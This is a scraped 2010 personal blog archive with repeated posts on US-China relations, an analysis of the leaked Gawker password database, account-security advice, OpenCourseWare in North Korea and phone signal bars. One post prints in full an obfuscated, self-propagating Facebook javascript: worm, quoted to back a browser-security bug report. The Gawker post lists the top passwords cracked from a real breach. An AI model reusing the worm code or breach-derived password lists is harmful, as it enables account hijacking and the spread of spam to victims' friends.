I had to write a short essay about an emerging issue in US-China relations and what I think should be done about it. I figured I'd post it here too. Short story: we all need to learn Chinese.
--
The next 10 years will see the beginning of the end of the US' "free lunch". As the standard of living continues to improve in China and as economic reform and access to information continues to spur growth, wages and prices will rise, which will cause an increase in the cost of goods manufactured in China, and much of this cost increase will be passed on to the American consumer. The increase in the cost of consumer goods may make continuing to import goods from China unsustainable for some industries. Unfortunately the US has already lost (or never developed) the ability to manufacture certain goods and materials in quantity, and has long relied on cheap manufacturing in Chinese factories. Chinese economic growth is therefore likely to cause tensions between China and the US.
Meanwhile China has started investing heavily in outsourcing cheap manufacturing to Africa and other developing regions, so it is likely that China will emerge as the next super-consumer country, and with an emerging middle-class and much greater purchasing power than the US (and maintaining trillions of dollars of US debt), the rise of China will likely drag the US into economic doldrums.
The traditional business and economic approaches to address this problem will all of course be pursued (investing in emerging Chinese markets, exporting Western brands to China and/or developing multinational business conglomerates). However I think to truly stay relevant, the US needs to focus on teaching Chinese language and culture to every school student the way that every Chinese school student is taught English language and culture, and the US government needs to focus on setting up an extensive network of student exchange programs with China and other Chinese-speaking countries. By exposing school children to and culture, the next generation of business leaders, political leaders, scientists and engineers will be enabled to work alongside Chinese counterparts rather than simply competing against them while the economics of scale turn in China's favor.
2010-12-31
2010-12-17
2010-12-14
My quick analysis of the leaked Gawker passwords
I just got an email from Gawker Media stating that their login details on Lifehacker, Gizmodo etc. had been compromised and a database of 1.3M usernames and passwords was being distributed via Bittorrent. Naturally I went and found the database and downloaded it. I extracted the subset of passwords from the file that have already been cracked, and uniquified and generated counts. You can download the list at the end of this post.
I have written about the dangers of using one password on multiple accounts before, and when I used to work at a company where I had access to a massive password database, I was shocked to discover how many people use really weak passwords -- like a first name or a number like 123456, or the word "password".
The leaked Gawker data contains the following explanatory text (along with a ton of leaked private chat logs between Gawker executives, and other juicy stuff):
After gaining access to gawkers MySQL database we stumble upon a huge
table containing ~1,500,000 users. After a few days of dumping we
decided that 1.3 million was enough.
Gawker uses a really outdated hashing algorithm known as DES (Data Encryption Standard).
Because DES has a maximum of 8chars using a password like "abcdefgh1234" only the
first 8 characters "abcdefgh" are encrypted and stored in the database. If your
password is longer than 8 characters you only need to enter the first 8 characters
to log in!
YA DONT SAY!! :D?
Because of this we were only able to recover the first 8 characters of someones password!
If the password is 8 characters long there's a good chance that it migt be longer
than 8 characters! But still, there's 1000's of people using 1 - 8 character passwords
for us to have some fun with!
We managed to crack ~200,000 hashes, if you want the rest of them cracking
DO IT YOUR ****ING SELF! >:3 (censored)
So ~200,000 hashes were cracked out of 1.3M by de-hashing (actually 188281 hashes were cracked, producing 91688 unique passwords). I assume that the 189k passwords that were cracked are somewhat representative of the rest of the database.
I ran some basic statistics on the password database because I was interested in seeing the distribution of password usage. Here is a plot of the usage count (out of 189k cracked passwords total) for the top 50 passwords:
Here is the same plot with a log Y axis and with the rank of all cracked passwords shown on the X axis:
Basically the top 5 or so passwords are used by a ridiculously high proportion of users, and the top few thousand passwords are very common and therefore very easy to guess using a dictionary attack.
Here are the top 50 passwords, with their rank and count out of 189k:
Rank Count Password
1 3057 123456
2 1955 password
3 1119 12345678
4 661 lifehack
5 418 qwerty
6 333 abc123
7 311 111111
8 300 monkey
9 273 consumer
10 253 12345
11 247 letmein
12 241 trustno1
13 233 dragon
14 213 baseball
15 208 superman
16 202 iloveyou
17 202 1234567
18 199 gizmodo
19 196 sunshine
20 194 1234
21 187 princess
22 184 starwars
23 179 whatever
24 175 shadow
25 158 000000
26 157 cheese
27 156 123123
28 149 nintendo
29 149 football
30 148 computer
31 141 ****you (censored)
32 135 654321
33 134 blahblah
34 132 passw0rd
35 132 master
36 126 soccer
37 124 michael
38 120 666666
39 118 jennifer
40 115 gawker
41 114 Password
42 114 jordan
43 113 pokemon
44 113 pepper
45 113 michelle
46 113 killer
47 111 welcome
48 111 batman
49 109 kotaku
50 109 internet
This gives an insight into the password-setting habits (and, if you read through more of the list, the mentality) of a large proportion of the Internet-using population.
A lot of people use numerical passwords -- here are the top 50 numerical passwords. Check out the password at rank 221:
Rank Count Password
1 3057 123456
3 1119 12345678
7 311 111111
10 253 12345
17 202 1234567
20 194 1234
25 158 000000
27 156 123123
32 135 654321
38 120 666666
74 82 123321
100 72 123
101 72 121212
137 63 159753
163 56 88888888
164 56 11235813
186 53 7777777
202 50 555555
221 48 8675309
236 47 98765432
237 47 11111111
243 46 696969
253 45 112233
267 43 00000000
272 42 1111
286 41 123654
318 39 222222
344 37 131313
430 32 0000
501 29 987654
502 29 55555
537 28 12341234
608 25 102030
643 24 147258
645 24 101010
684 23 888888
685 23 159357
741 22 789456
742 22 11223344
743 22 007007
799 21 12312312
869 20 99999999
871 20 147852
872 20 1212
873 20 11111
874 20 09876543
1105 17 0123456
1218 16 151515
1219 16 123789
1221 16 112358
DOWNLOAD LINK: Curious to see the passwords of all 189,000 users? Here's with counts for each password. It's a .tsv file (tab-separated values), you can load it into a spreadsheet or text editor. (This file doesn't contain names or usernames, just the password info. If you want usernames you'll have to go get them yourself.)
UPDATES:
I have written about the dangers of using one password on multiple accounts before, and when I used to work at a company where I had access to a massive password database, I was shocked to discover how many people use really weak passwords -- like a first name or a number like 123456, or the word "password".
The leaked Gawker data contains the following explanatory text (along with a ton of leaked private chat logs between Gawker executives, and other juicy stuff):
After gaining access to gawkers MySQL database we stumble upon a huge
table containing ~1,500,000 users. After a few days of dumping we
decided that 1.3 million was enough.
Gawker uses a really outdated hashing algorithm known as DES (Data Encryption Standard).
Because DES has a maximum of 8chars using a password like "abcdefgh1234" only the
first 8 characters "abcdefgh" are encrypted and stored in the database. If your
password is longer than 8 characters you only need to enter the first 8 characters
to log in!
YA DONT SAY!! :D?
Because of this we were only able to recover the first 8 characters of someones password!
If the password is 8 characters long there's a good chance that it migt be longer
than 8 characters! But still, there's 1000's of people using 1 - 8 character passwords
for us to have some fun with!
We managed to crack ~200,000 hashes, if you want the rest of them cracking
DO IT YOUR ****ING SELF! >:3 (censored)
So ~200,000 hashes were cracked out of 1.3M by de-hashing (actually 188281 hashes were cracked, producing 91688 unique passwords). I assume that the 189k passwords that were cracked are somewhat representative of the rest of the database.
I ran some basic statistics on the password database because I was interested in seeing the distribution of password usage. Here is a plot of the usage count (out of 189k cracked passwords total) for the top 50 passwords:
Here is the same plot with a log Y axis and with the rank of all cracked passwords shown on the X axis:
Basically the top 5 or so passwords are used by a ridiculously high proportion of users, and the top few thousand passwords are very common and therefore very easy to guess using a dictionary attack.
Here are the top 50 passwords, with their rank and count out of 189k:
Rank Count Password
1 3057 123456
2 1955 password
3 1119 12345678
4 661 lifehack
5 418 qwerty
6 333 abc123
7 311 111111
8 300 monkey
9 273 consumer
10 253 12345
11 247 letmein
12 241 trustno1
13 233 dragon
14 213 baseball
15 208 superman
16 202 iloveyou
17 202 1234567
18 199 gizmodo
19 196 sunshine
20 194 1234
21 187 princess
22 184 starwars
23 179 whatever
24 175 shadow
25 158 000000
26 157 cheese
27 156 123123
28 149 nintendo
29 149 football
30 148 computer
31 141 ****you (censored)
32 135 654321
33 134 blahblah
34 132 passw0rd
35 132 master
36 126 soccer
37 124 michael
38 120 666666
39 118 jennifer
40 115 gawker
41 114 Password
42 114 jordan
43 113 pokemon
44 113 pepper
45 113 michelle
46 113 killer
47 111 welcome
48 111 batman
49 109 kotaku
50 109 internet
This gives an insight into the password-setting habits (and, if you read through more of the list, the mentality) of a large proportion of the Internet-using population.
A lot of people use numerical passwords -- here are the top 50 numerical passwords. Check out the password at rank 221:
Rank Count Password
1 3057 123456
3 1119 12345678
7 311 111111
10 253 12345
17 202 1234567
20 194 1234
25 158 000000
27 156 123123
32 135 654321
38 120 666666
74 82 123321
100 72 123
101 72 121212
137 63 159753
163 56 88888888
164 56 11235813
186 53 7777777
202 50 555555
221 48 8675309
236 47 98765432
237 47 11111111
243 46 696969
253 45 112233
267 43 00000000
272 42 1111
286 41 123654
318 39 222222
344 37 131313
430 32 0000
501 29 987654
502 29 55555
537 28 12341234
608 25 102030
643 24 147258
645 24 101010
684 23 888888
685 23 159357
741 22 789456
742 22 11223344
743 22 007007
799 21 12312312
869 20 99999999
871 20 147852
872 20 1212
873 20 11111
874 20 09876543
1105 17 0123456
1218 16 151515
1219 16 123789
1221 16 112358
DOWNLOAD LINK: Curious to see the passwords of all 189,000 users? Here's with counts for each password. It's a .tsv file (tab-separated values), you can load it into a spreadsheet or text editor. (This file doesn't contain names or usernames, just the password info. If you want usernames you'll have to go get them yourself.)
UPDATES:
- Ranks and accidentally-stripped leading zeroes fixed.
- Highlighting one of my replies to a comment: if you have to even ask if your password is on this list, it's probably not secure enough!
Labels:
crack,
gawker password leak,
hack
2010-08-09
Someone stole your password on facebook or your email account? What to do about it -- and why it's worse than you think
I get emails or facebook messages "from friends" every couple of weeks that are spam, and that the friend clearly did not intend to send. It is obvious that the password on the friend's email account or facebook account got stolen. This is potentially a lot more serious than it seems -- this can make old-school identity theft look like childplay: If somebody steals your email password they have everything about you. They can not only trawl through all your email to gather information about your life for impersonating you, blackmailing you or other nefarious purposes, but they can also send password reset requests to any other website you have registered with, and steal your passwords on all those sites too.
For this reason, your email password is gold, and you should protect it more than any other password: it should be harder to guess than other passwords, longer, not be based on dictionary words etc., and you shouldn't use your email account password on any other website! Why? Because when you register on another site XYZ.com, and XYZ.com asks you to register with your email address and a password, and if you use your email account password as your password on XYZ.com too, then if that website's owners are evil or if somebody hacks their site, they have both your email address and your email account password.
There are three main way people steal your email passwords:
(1) Dictionary attack. I had access to a database of thousands of user login credentials in one job I worked at, and more than 60% of passwords were just a first name! Scammers/spammers just go through a dictionary and submit every word in the dictionary to a website as passwords with common or publicly-visible usernames until they get in. This is becoming less common because of security precautions like having to type in a Captcha when you get the password wrong, but still -- if you have a simple name or word as your password, fix it! Use letters, numbers, upper and lowercase, and punctuation. Make it at least 8 characters long. Write down passwords somewhere secure and memorize your main email account password.
(2) Keylogging. This is becoming the most common method for stealing passwords today: most viruses that infect your computer will install a keylogger that sends every keystroke you type -- login names, passwords, credit card numbers, love letters -- to a computer in China or Russia. And a substantial number of computers you have probably used in the last few years have had one of these viruses on them. No I'm not kidding. See below for how to clean up your computer if it's infected, and general guidelines of how to avoid this issue.
(3) You used your email account password on other sites too, and those sites were either malicious or got hacked. It was recently revealed that reuse their email password on social networking sites like Facebook. Don't ever, ever use your email account password to register anywhere else.
Q: My password got stolen. What do I do?
Step 1: If you can log into your email account and the spammers literally just started sending out messages from it, log in immediately and change the password. You might have to change the password again later, because your computer may still be infected with a keylogger (see point (2) above) and they might be able to watch you change your password. But change it now to halt them in their tracks. If you can't log into your email account because they changed your password on you (it does happen), then try sending a password reset request, if your account is connected with another email account that you can access, or contact your email provider (or facebook, if it's your facebook account) to notify them of the problem.
Step 2: Assess the damage. Look in your Sent folder to see what they sent and to whom. Send out a "Sorry -- don't click on this link, I didn't send it" message or something -- lots of the links sent out by spammers go to sites that try to infect more people's computers with viruses.
Step 3: Get all the critical updates for your computer and update your antivirus software. Follow all the steps in my other blog post about speeding up your computer. Following those steps will not only speed up your computer but should guarantee that any viruses on your computer are killed and that you are safe from viruses in the future. In the end you should (a) have all the critical Microsoft updates on your computer, (b) have replaced your antivirus software (Norton/Symantec/McAfee/Kapersky/ClamAV/etc.) with Microsoft Security Essentials (it's a lot better at catching viruses than the others, and it's free forever so you don't have to pay to stay up to date so your computer catches the latest viruses), and (c) you should have Google Chrome installed as your browser and you should never use Internet Explorer again, it is one of the biggest reasons computers get infected with viruses, because it is so insecure.
Step 4: With your new bulletproof computer, go to any other site that you used the same password on as the email password that was stolen, and change your passwords there too. Then probably go back and change your main email account password again, just in case you had a keylogger on your computer that got eliminated in Step 3. Here's a general strategy for selecting passwords:
- Password Level 1: Have a throwaway, "don't care" password that you can use for all those sites that ask you to register that you wouldn't mind someone stealing your password for -- like when you have to register on a bulletin board to ask a question about your car, and you never plan to go back there again. Reuse this password on other sites only when you don't care if somebody who has access to one of those sites with a stolen password has access to all of them -- because if your account gets hacked on that site, it can get hacked on other sites too.
- Password Level 2: Have a second level of password that you use for sites that you do care about somebody breaking into -- for example any e-commerce site like Amazon.com that saves your credit card details. Use a different password for each site that stores credit card details! Remember that sites that save credit card details are especially targeted by hackers/crackers. Ways of generating unique passwords for these sites include just writing each password down, coming up with a tricky way of taking a base password and combining some letters from the domain name of the site into the password to make a non-predictable unique password for each site, or using something like to generate and save the passwords for you.
- Password Level 3: You should have a more secure password for your bank and your bank only. Each bank should have its own password. You should also request extra authentication methods from your bank if it is available -- e.g. PayPal has a keyfob that generates a pseudo-random number when you push a button (a new number every minute) that you have to type in right after your password. This verifies you have the physical device, and protects you from password attacks.
- Password level 4: Your main email account password on gmail, yahoo, hotmail etc. This must be secure, unique, and unguessable. Note that I put the security requirements for this password even higher than the requirements for your bank password. Don't underestimate what somebody can do with your email account password.
Step 5: In future, don't log into your main email account on any computer that is *not* running Microsoft Security Essentials, and don't ever use Internet Explorer to do it -- no matter how badly you need the Internet. I never, under any circumstances, ever log into my email account on a Windows computer that is not my own (but I'm more paranoid than most, I just deal with the fallout all the time when people come to me to fix their virus-ridden computers, and I know that most people have not followed the steps above for guaranteeing their computers are virus-free). Getting a cellphone that you can read your email on helps with this, it lets you check email and reply even when you're away from the safety haven of your own computer. In particular, avoid Internet cafes especially while traveling -- a large majority of computers in Internet cafes are infected with some sort of spyware that will send your passwords and credit card numbers who-knows-where.
Good luck :-)
Labels:
antivirus software,
can't log in,
stolen password,
virus
2010-08-02
Taking OpenCourseWare to North Korea
A blog post I wrote for , . I'm going with Choson Exchange to Pyongyang in September -- my second trip to North Korea -- and I'm heading up their OpenCourseWare strategy.
----
Choson Exchange to Share Creative Commons Licensed Materials from the World's Best Universities With North Korea
Choson Exchange is committed to providing educational materials from the world's best educational institutions to North Korean students free of charge. This goal is made possible through the initiative, in which dozens of top universities all around the world have chosen to post a large number of course materials such as lecture videos, lecture notes, handouts and assignments on the Internet under the Creative Commons open access license. This license gives people all over the world the ability to obtain a top-quality education for free, and gives professors the ability to legally reuse these materials and incorporate them into their own teaching.
Several other sources of top-quality educational materials are also available under Creative Commons licenses, such as lectures on a wide array of topics in mathematics, economics and finance from the , full high-quality textbooks on and encyclopedic content on . Recently, WikiBooks and Wikipedia added the ability to select sets of articles and have them assembled into a PDF format e-book for downloading, or these books can be easily printed, bound and shipped with a few mouse clicks through a company called . This provides an easy method for creation of high-quality printed textbooks or e-books that meet the content and pedagogical requirements of our North Korean colleagues.
Choson Exchange has been invited to present Open CourseWare content and e-books at the in September 2010. The initial content that we will take to North Korea includes both OCW and Wikipedia/WikiBooks-sourced material in the subject areas of business, economics and finance; basic sciences such as physics, chemistry and biology; medicine, including first aid, physiology and gynaecology; computer science and engineering. We plan to bring both electronic copies of lecture videos and lecture notes as well as printed copies of some WikiBooks to use in exhibitions in Pyongyang and training programs.
The quality of many of the materials available through Creative Commons sources is very high. However no educational program can stand on the strength of the educational materials alone, there is a lot of structure and that has to be put in place for an educational program to succeed. For this reason, Choson Exchange is also committed to helping create and support the teaching infrastructure necessary to effectively kickstart training courses incorporating open content. To accomplish this, foreign advisors who are expert in each teaching area are being recruited to assist in helping their North Korean counterparts get up to speed with teaching the new academic material. We are confident this is the fastest way to improve the quality of education, and that improving education will improve quality of life and the level of wellbeing of the country.
Finally, North Korea is unprecedented in its culture and rich history. As we work with our North Korean colleagues to bring the highest quality Creative Commons academic materials from the best educational institutions to North Korea and help them to build programs that employ these resources, we would also like to work with them, if they choose, to contribute North Korean literature, cultural and academic course materials back into the body of Open CourseWare, so that the world can learn about the North Korean story directly from North Koreans themselves. This will add to the richness of the cultural tapestry that is the Creative Commons.
Posted by Luke Hutchison, Director of Educational Technologies for Choson Exchange
----
Choson Exchange to Share Creative Commons Licensed Materials from the World's Best Universities With North Korea
Choson Exchange is committed to providing educational materials from the world's best educational institutions to North Korean students free of charge. This goal is made possible through the initiative, in which dozens of top universities all around the world have chosen to post a large number of course materials such as lecture videos, lecture notes, handouts and assignments on the Internet under the Creative Commons open access license. This license gives people all over the world the ability to obtain a top-quality education for free, and gives professors the ability to legally reuse these materials and incorporate them into their own teaching.
Several other sources of top-quality educational materials are also available under Creative Commons licenses, such as lectures on a wide array of topics in mathematics, economics and finance from the , full high-quality textbooks on and encyclopedic content on . Recently, WikiBooks and Wikipedia added the ability to select sets of articles and have them assembled into a PDF format e-book for downloading, or these books can be easily printed, bound and shipped with a few mouse clicks through a company called . This provides an easy method for creation of high-quality printed textbooks or e-books that meet the content and pedagogical requirements of our North Korean colleagues.
Choson Exchange has been invited to present Open CourseWare content and e-books at the in September 2010. The initial content that we will take to North Korea includes both OCW and Wikipedia/WikiBooks-sourced material in the subject areas of business, economics and finance; basic sciences such as physics, chemistry and biology; medicine, including first aid, physiology and gynaecology; computer science and engineering. We plan to bring both electronic copies of lecture videos and lecture notes as well as printed copies of some WikiBooks to use in exhibitions in Pyongyang and training programs.
The quality of many of the materials available through Creative Commons sources is very high. However no educational program can stand on the strength of the educational materials alone, there is a lot of structure and that has to be put in place for an educational program to succeed. For this reason, Choson Exchange is also committed to helping create and support the teaching infrastructure necessary to effectively kickstart training courses incorporating open content. To accomplish this, foreign advisors who are expert in each teaching area are being recruited to assist in helping their North Korean counterparts get up to speed with teaching the new academic material. We are confident this is the fastest way to improve the quality of education, and that improving education will improve quality of life and the level of wellbeing of the country.
Finally, North Korea is unprecedented in its culture and rich history. As we work with our North Korean colleagues to bring the highest quality Creative Commons academic materials from the best educational institutions to North Korea and help them to build programs that employ these resources, we would also like to work with them, if they choose, to contribute North Korean literature, cultural and academic course materials back into the body of Open CourseWare, so that the world can learn about the North Korean story directly from North Koreans themselves. This will add to the richness of the cultural tapestry that is the Creative Commons.
Posted by Luke Hutchison, Director of Educational Technologies for Choson Exchange
Labels:
Choson Exchange,
North Korea,
OCW,
OpenCourseWare
2010-07-23
Why Harvard Students are successful; dealing with Harvard Karma Envy
I just tweeted:
: The Social Network http://goo.gl/rarh looks semi-interesting, Zuck well-casted, but actors look more like Hollywood than Harvard
I immediately got the following response:
: I think our different reactions to the social network are so interesting! I'm electrified by it! You're so humdrum about it! I wonder if it's because Harvard is not a land of mystique for you--it's your daily. For better or worse, the whole meme of Harvard seduces me.
(I take classes at Harvard and attend MIT.) I posted the following reply, which I thought was worth reposting here, because I think I learned something by tweeting it:
@MetaLev: Harvard seduced me too until I went to take classes there, and realized everyone is pretty normal. Normal but with an edge that I would best describe as a tendency to choose to thrive. They're a bit more enthusiastic and excited about possibilities and opportunities than the average person. That is all. Although that's a big "all", it has remarkable consequences. I hope this is teachable, I want my kids to take this approach to life.
and, because karma envy is relevant to any discussion about Harvard, here's some more of the conversation:
@positiveneuro: That's really insightful re:differences about Harvard kids, Luke. That's GOT to be a conditioned attitude. A friend's comment to me: "I think you reacted so strongly to the preview because you want to be a mark zuckerberg"
@MetaLev: Yeah -- karma envy :-) Be your own MZ.
@positiveneuro: I can't remember if we've discussed this principle from the bhagavad gita or not: it is better to live your own destiny imperfectly than to live someone else's destiny perfectly
@MetaLev: Hmm. You could also say it's better to live your own destiny perfectly than someone else's imperfectly. You probably won't be the next Mark Zuckerberg, you'd be imperfect at it if you tried. But he will never be the perfect you either.
: The Social Network http://goo.gl/rarh looks semi-interesting, Zuck well-casted, but actors look more like Hollywood than Harvard
I immediately got the following response:
: I think our different reactions to the social network are so interesting! I'm electrified by it! You're so humdrum about it! I wonder if it's because Harvard is not a land of mystique for you--it's your daily. For better or worse, the whole meme of Harvard seduces me.
(I take classes at Harvard and attend MIT.) I posted the following reply, which I thought was worth reposting here, because I think I learned something by tweeting it:
@MetaLev: Harvard seduced me too until I went to take classes there, and realized everyone is pretty normal. Normal but with an edge that I would best describe as a tendency to choose to thrive. They're a bit more enthusiastic and excited about possibilities and opportunities than the average person. That is all. Although that's a big "all", it has remarkable consequences. I hope this is teachable, I want my kids to take this approach to life.
and, because karma envy is relevant to any discussion about Harvard, here's some more of the conversation:
@positiveneuro: That's really insightful re:differences about Harvard kids, Luke. That's GOT to be a conditioned attitude. A friend's comment to me: "I think you reacted so strongly to the preview because you want to be a mark zuckerberg"
@MetaLev: Yeah -- karma envy :-) Be your own MZ.
@positiveneuro: I can't remember if we've discussed this principle from the bhagavad gita or not: it is better to live your own destiny imperfectly than to live someone else's destiny perfectly
@MetaLev: Hmm. You could also say it's better to live your own destiny perfectly than someone else's imperfectly. You probably won't be the next Mark Zuckerberg, you'd be imperfect at it if you tried. But he will never be the perfect you either.
2010-07-22
Stupid Facebook Javascript Viruses
"Sarah liked GIRLS ARE UNABLE TO STARE AT THIS FOR 10 SECONDS, BUT GUYS CAN on Facebook and suggested you like it too."
I get up to two invitations per week on facebook from friends to view some page that promises to show me something amazing/shocking/titillating. These are usually sent by friends who I doubt intended to send me these invitations, and inevitably they are links to facebook pages that tell me to paste some javascript code into the addressbar to view the advertised page. Of course if you do as you're told to do, then all your friends are automatically emailed an invitation to view the page -- without your knowledge.
A surprising number of people have been falling for this attack -- probably in the millions because facebook has 500M users and a good number of my own fb friends have fallen for this. Someday I'm sure I'll get an invitation from someone that they'll be very embarrassed about -- because it is something they never would have sent, but the fact I got it indicates that they opened the link themselves...
I'm having a very hard time getting browser vendors to take this combination of cross-site scripting (XSS) and social engineering seriously :( It's rather ridiculous that both the addressbar and the bookmarks bar (via bookmarklets) will happily execute Javascript code without warning the user or enforcing any sort of constraints on security context!
The WHATWG mailing list thread I started about this:
I filed bug reports for Chromium, but unfortunately the bug reports are security-related so you probably can't see them unless you're a Chromium developer: ; ;
UPDATE: Firefox has a related bug:
All bugs have been closed as WONTFIX, and the WHATWG mailing list (the only list that most of the browser vendors subscribe to, with the exception of MS of course) doesn't really want to fix this.
Here are my suggestions from the latest bug report for how to fix this:
When you install a .crx extension, you are warned about the security implications of doing so. However if you drag a "javascript:" bookmarklet to the bookmarks bar, you are not given a security warning -- however bookmarklets have access to the security context of whatever page is currently open when they are clicked. For that reason, the bookmarklets system is vulnerable to exploitation via social engineering, and literally millions of facebook friends lists have been hacked this way by self-propagating js viruses.
Also, having a user paste javascript: URLs into the address bar is already heavily exploited by facebook viruses to spread like wildfire by auto-sending themselves to all your fb friends.
Proposed solutions:
(1) The same warning should be given when dragging bookmarklets to the addressbar as is given when installing .crx extensions.
(2) Chrome's anti-phishing system should be used to check where bookmarklets have originated (if dragged/dropped), and sites like facebook.com should be blacklisted for javascript:* bookmarklets (*not* for javascript:* URLs that are clicked on, just for URLs dragged to the addressbar).
(3) Javascript that has no known origin (that is typed directly into the URL bar) should either be disabled by default (re-enablable via debug option, for the tiny 0.0001% of users that need this functionality), or at the very least and less preferably, the user should be given a security warning when hitting Enter after entering such a URL. There is no legitimate reason for the other 99.9999% of users to need to enter javascript URLs into the addressbar.
Given the success of these exploits so far on facebook, the use and nefariousness of them will likely only increase.
Here's an example of the sort of javascript employed -- e.g. this one is from a page entitled "World's Hardest Riddle" and has you type Ctrl-C, Alt-D, Ctrl-V and then Enter to reveal the riddle (i.e. to copy all this into the addressbar): anyone care to disentangle what this is doing?
javascript:(function(){a='app107450945963197_jop';b='app107450945963197_jode';
ifc='app107450945963197_ifc';ifo='app107450945963197_ifo';mw='app1074509459631
97_mwrapper';eval(function(p,a,c,k,e,r){e=function(c){return(c
(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(
/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=funct
ion(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'
\\b','g'),k[c]);return p}('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i
\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k
\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f
\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h
","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q
\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f
\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g
\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l
\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];
s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c
);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2
]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6
C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTim
eout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x4
4|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))})();
2010-07-03
Android vs iPhone 4 signal strength display (FWIW)
In the light of the iPhone 4 fiasco, AnandTech the signal-strength-to-bars mapping for the iPhone 4. "Interested in signal-bar calculations? Android is open source, check updateSignalStrength() in ". I used this source, combined with referenced in the Android source (thanks to for the link) to produce the following graph comparing signal strength indicators on Android and the iPhone 4.
I want to stress that since the number of bars displayed for a given signal strength is just a subjective way of presenting signal strength info to the user, so this graph is only presented for what it's worth -- don't read too much into it or get hung up on the details :-) (As pointed out in the comment below, "for all the millions of dollars in lost productivity spent discussing 'bars'...")
Observations:
> <
--
Updates:
(1) an insightful by xtal on Slashdot:
I want to stress that since the number of bars displayed for a given signal strength is just a subjective way of presenting signal strength info to the user, so this graph is only presented for what it's worth -- don't read too much into it or get hung up on the details :-) (As pointed out in the comment below, "for all the millions of dollars in lost productivity spent discussing 'bars'...")
Observations:
- The iPhone 4 consistently displays a greater percentage signal strength than Android (as defined by the fraction of bars lit). However the signal-strength-to-bars mapping is not regulated or defined anywhere, other than the fact that Apple said in their that AT&T recently came up with their own recommendation for this mapping on their own network. Nothing necessarily says Android is more "right" than Apple.
- Both Android and the iPhone 4 display the maximum number of bars (5/5 on iPhone, 4/4 on Android) for over half the usable signal strength range (as measured on the dBm scale). The implication of this is probably that it's common industry practice to show full bars whenever the signal is strong enough that there are no real or noticeable connection problems. So Apple may be inflating their signal strength status slightly for weaker signals in order to make it look like the iPhone 4 has excellent reception, but at least the practice of reporting full bars at -90dBm or greater appears to be the norm (based on these two data points), even though there's still a lot of signal strength headroom above that level.
- Assuming AnandTech's measurements are accurate, it's possible to come to the conclusion that the Apple signal strength numbers appear manually fudged, accidentally or otherwise: note the short dBm range for 3 bars and the extra-long dBm range for 4 bars. In other words the iPhone reports 4 bars at a much lower signal strength than it should relative to the other thresholds, the chosen thresholds don't follow a smooth curve.
- The iPhone 4 is generally overreporting the number of bars relative to Android for lower signal strengths (under -101dBm or so), but is about in line with Android for the highest signal strengths (over -97dBm). Assuming that a good set of thresholds were chosen in the Android source, and assuming that the radio in an average Android device and the radio in the iPhone 4 have similar characteristics, this supports Apple's point in their letter that weak signals were previously given too many bars. (Note however that the 3GPP standard only reports signal strength at 2dBm intervals, so selecting thresholds is not exactly a precise science, and the Android numbers are probably chosen somewhat arbitrarily too...)
- It's hard to say what mapping Apple will have to use to make it look like the Grip of Death isn't an issue on the iPhone, but based on AnandTech's testing the attenuation is high enough that they won't be able to hide it entirely.
- Note that the Nexus One suffers from a similar problem to the iPhone 4, you can easily lose 3G reception if you grip the phone along the metal strip at the back.
Update: The comparison is made murkier by the fact that AT&T uses WCDMA for their 3G data connection and T-Mobile and other GSM carriers use standard GSM 3G standards. The characteristics of different data transmission standards may be dissimilar as signal strength varies and across changes in environmental characteristics such as noise levels and terrain.
> <
--
Updates:
(1) an insightful by xtal on Slashdot:
For all of the millions of dollars being lost on productivity aimlessly discussing 'bars'..
Can someone please dissect the antenna and then connect it to a calibrated spectrum analyser? This is so mindbogglingly trivial to do it is beginning to hurt my soul. I do similar exercises at work with new, untested antenna designs. I am sure I am not the only one.
For comparison, do the same to other phones and publish actual measurements of received signal drops and the effect from the disturbance caused from closing your hand around the antenna. This is similar to how touching an old rabbit-ears style antenna effects the picture on a analog TV broadcast, if the effect is as I suspect.
Voila! An actual, meaningful assessment of what the phone bars mean in real numbers from a calibrated instrument.
An uncalibrated receiver, such as the iphone, is not a proper tool to do this.
Can someone please dissect the antenna and then connect it to a calibrated spectrum analyser? This is so mindbogglingly trivial to do it is beginning to hurt my soul. I do similar exercises at work with new, untested antenna designs. I am sure I am not the only one.
For comparison, do the same to other phones and publish actual measurements of received signal drops and the effect from the disturbance caused from closing your hand around the antenna. This is similar to how touching an old rabbit-ears style antenna effects the picture on a analog TV broadcast, if the effect is as I suspect.
Voila! An actual, meaningful assessment of what the phone bars mean in real numbers from a calibrated instrument.
An uncalibrated receiver, such as the iphone, is not a proper tool to do this.
2010-07-02
Post updated, see new link below
This post has been superceded by a newer post illustrating the Android vs iPhone 4 signal-strength-to-bars mapping, please visit that post instead.
Signal-strength-to-bars mapping on iPhone 4
